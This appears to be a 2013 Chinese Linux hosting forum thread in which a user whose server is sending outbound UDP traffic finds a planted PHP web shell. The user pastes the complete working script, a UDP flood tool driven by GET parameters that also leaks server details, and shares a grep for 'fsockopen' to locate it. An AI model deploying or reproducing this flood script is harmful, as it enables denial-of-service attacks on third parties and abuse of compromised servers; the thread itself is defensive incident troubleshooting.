Board logo

标题: [求助] 切换到nginx+apache马上对外发包卡死 切换到apache暂时没有问题 [打印本页]
作者: qq369984    时间: 2013-12-27 08:34     标题: 切换到nginx+apache马上对外发包卡死 切换到apache暂时没有问题

有遇到相关问题的朋友嘛,请告知,是网站被挂马了,还是服务器被搞成肉鸡了?
作者: admin    时间: 2013-12-27 09:43

应该是被挂UDP的马了

被挂马了,切apache一样会有问题的,也许只是时间巧合
作者: qq369984    时间: 2013-12-27 20:11

回复 2# admin


   老大的 有什么好的解决办法嘛?
作者: qq369984    时间: 2013-12-27 20:14

1111.jpg
老大能告知一个哪个比较可疑吗?

图片附件: 1111.jpg (2013-12-27 20:14, 163.36 KB) / 下载次数 7910
http://wdlinux.cn/bbs/attachment.php?aid=4048&k=75e5741d0f1b533f7e781c97095d2eef&t=1734091562&sid=l3rHk3

作者: admin    时间: 2013-12-28 11:10

看这里,看不出来的

你查下你的服务器上有没马文件就是了
作者: qq369984    时间: 2013-12-29 00:09

回复 5# admin


   景安技术让我下载回来查杀,快有40G文件,也不方便啊。   LINUX 文件下的文件不是太熟悉,有些晕啊。
作者: qq369984    时间: 2013-12-29 00:25

[tr][/tr]
现在防火墙里面关闭了UDP对外发包 只开放了 DNS 不知道能不能行




作者: qq369984    时间: 2013-12-29 01:33

<?php
set_time_limit(999999);
$host = $_GET['ip'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
        if (StrLen($_GET['rat'])<>0){
                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
                exit;
            }
        echo "Warning to: opening";
        exit;
    }

for($i=0;$i<$Sendlen;$i++){
        $out .= "A";
    }

$max_time = time()+$exec_time;
while(1){
    $packets++;
    if(time() > $max_time){
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
        if($fp){
            fwrite($fp, $out);
            fclose($fp);
    }
}

echo "Send Host:$hostport<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>


哈哈 老大 木马让我找到了  给大家分享一下办法 查找字符串grep -r "fsockopen" ./ 然后一个个分析
作者: admin    时间: 2013-12-29 09:48

很好,正是此马

其实不用下载所有的文件,只要查找PHP类型的文件即可
作者: qq369984    时间: 2013-12-29 10:52

回复 9# admin


谢谢老大
作者: alin    时间: 2014-5-3 17:29

只要查找PHP类型的文件即可,是什么意思?今天我服务器也不稳定,机房说是服务器发包,怎么解决呢,我晕



欢迎光临 WDlinux官方论坛 (http://wdlinux.cn/bbs/) Powered by Discuz! 7.2